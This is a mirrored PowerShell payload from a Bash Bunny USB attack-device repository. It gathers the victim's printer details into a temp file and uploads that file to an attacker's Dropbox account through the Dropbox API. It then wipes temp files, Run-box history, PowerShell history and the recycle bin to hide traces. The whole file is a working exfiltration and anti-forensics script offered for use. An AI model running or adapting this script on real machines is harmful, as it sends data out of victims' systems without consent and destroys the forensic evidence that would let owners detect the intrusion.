mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
50 lines
1.4 KiB
PowerShell
50 lines
1.4 KiB
PowerShell
function DropBox-Upload {
|
|
|
|
[CmdletBinding()]
|
|
param (
|
|
|
|
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
|
[Alias("f")]
|
|
[string]$SourceFilePath
|
|
)
|
|
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
|
|
$outputFile = Split-Path $SourceFilePath -leaf
|
|
$TargetFilePath="/$outputFile"
|
|
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
|
$authorization = "Bearer " + $DropBoxAccessToken
|
|
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
|
$headers.Add("Authorization", $authorization)
|
|
$headers.Add("Dropbox-API-Arg", $arg)
|
|
$headers.Add("Content-Type", 'application/octet-stream')
|
|
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
|
}
|
|
|
|
function Clean-Exfil {
|
|
|
|
# empty temp folder
|
|
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
|
|
|
# delete run box history
|
|
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
|
|
|
# Delete powershell history
|
|
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
|
|
|
# Empty recycle bin
|
|
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
|
|
|
}
|
|
|
|
$F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt"
|
|
|
|
Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1
|
|
|
|
DropBox-Upload -f $F1
|
|
|
|
Clean-Exfil
|
|
|
|
|
|
|
|
|
|
|